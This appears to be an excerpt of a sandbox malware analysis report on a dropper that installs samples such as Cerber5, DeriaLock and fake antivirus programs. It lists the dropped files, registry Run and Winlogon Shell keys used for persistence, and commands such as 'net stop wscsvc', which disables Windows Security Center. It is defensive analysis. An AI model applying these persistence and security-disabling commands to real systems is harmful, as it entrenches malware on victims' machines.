          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Krotten.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@Movie.mpeg.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@InternetSecurityGuard.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeFile created: C:\Program Files (x86)\antiviruspc2009\libltdl3.dllJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file
          Source: C:\Users\user\Desktop\07bb0738.exeFile created: C:\Users\user\Desktop\Endermanch@SecurityDefener2015.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\COMCTL32.OCXJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\antivirus-platinum.exeJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\MSCOMCTL.OCXJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\cscc.datJump to dropped file
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeFile created: C:\Windows\302746537.exeJump to dropped file
          Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\dispci.exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /Delete /F /TN rhaegal
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeKey value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon Shell
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess created: C:\Windows\SysWOW64\net.exe net stop wscsvc
          Source: C:\Windows\antivirus-platinum.exeRegistry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run AntivirusJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\Desktop\Endermanch@Birele.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run system
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\07bb0738.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@Antivirus.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPlatinum.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AntivirusPro2017.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\Endermanch@AnViPC2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\302746537.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@Cerber5.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files (x86)\antiviruspc2009\avpc2009.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@DeriaLock.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@FakeAdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@HappyAntivirus.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\netsh.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\schtasks.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\antivirus-platinum.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Local\6AdwCleaner.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\Endermanch@InfinityCrypt.exeProcess information set: NOOPENFILEERRORBOX
